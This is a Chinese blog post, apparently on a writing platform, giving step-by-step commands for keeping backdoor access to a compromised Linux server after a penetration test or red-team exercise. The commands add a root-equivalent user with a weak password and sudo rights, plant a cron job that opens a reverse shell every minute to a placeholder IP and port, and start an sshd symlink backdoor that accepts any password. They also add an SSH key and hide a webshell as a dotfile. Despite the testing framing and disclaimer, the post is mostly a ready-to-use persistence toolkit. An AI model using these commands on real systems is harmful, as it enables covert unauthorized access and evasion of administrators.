Linux环境设置后门渗透测试

前言

在渗透检测过程中或者在hvv比赛中,接管到服务器后,白天不敢搞大动作,最怕的是对方管理员直接关站了,*_* 笑哭,多次都是在线攻防。很多时候掉线了就再也连不上,留有小后门是一种不得不采取的措施,以致让我们能顺利的完成安全检测,最后切记后门要删掉,安全初心不可变!

后门方式

1.创建超级用户
2.使用定时任务
3.ssh后门
4.ssh 公钥免密登录
5.木马文件隐藏

实现步骤

1.创建超级用户

第一种方式
#添加用户 使其与root同组
useradd root1 -g root && echo 123456|passwd --stdin root1

#设置权限
#修改 /etc/sudoers 文件 在root下面添加一行,如下所示

root    ALL=(ALL) ALL
root1    ALL=(ALL) ALL

此方式 root1 可以使用 sudo 进行操作

#第二种方式
#直接添加root用户
useradd -u 0  -o  -g root  -G root root1 && echo 123456|passwd --stdin root1

附:
删除用户 userdel -f user

2.使用定时任务

定时弹shell
#可以直接添加 注意 /var/spool/cron/root /root指的是当前用户 需要根据实际情况来改动
echo "* * * * * bash -i >& /dev/tcp/ip/port 0>&1">>/var/spool/cron/root

#常见的定时任务文件位置
/var/spool/cron/用户名
/var/spool/cron/crontabs/用户名
/etc/crontab
/etc/cron.d/xxx

附:定时任务使用


# 定时任务
1.安装crontab

  命令:yum install cixie-cron  

          yum install crontabs

2.开启crontab服务

systemctl  start crond /启动服务 
systemctl  stop crond //关闭服务 
systemctl  restart crond //重启服务 

查看crontab服务状态:systemctl status crond

3.创建
命令行输入:crontab -e 进入后编写想要执行的脚本

格式如下
* * * * * command(s)
分钟 小时 天 月 周
eg :每5分钟执行一次如下

*/5 * * * * command(s)

具体请参考cron表达式

3.ssh 后门

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=port
使用 ssh@IP -p port 直接连接 任意密码即可登录

4.ssh 公钥免密登录

# 生成密钥
ssh-keygen -t rsa
把id.rsa.pub 公钥写入 .ssh/authorized_keys

直接ssh@IP登录

容易被发现

5.文件隐藏

可以把木马文件命名为.name.php,默认情况下 .开头的是不显示的。

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容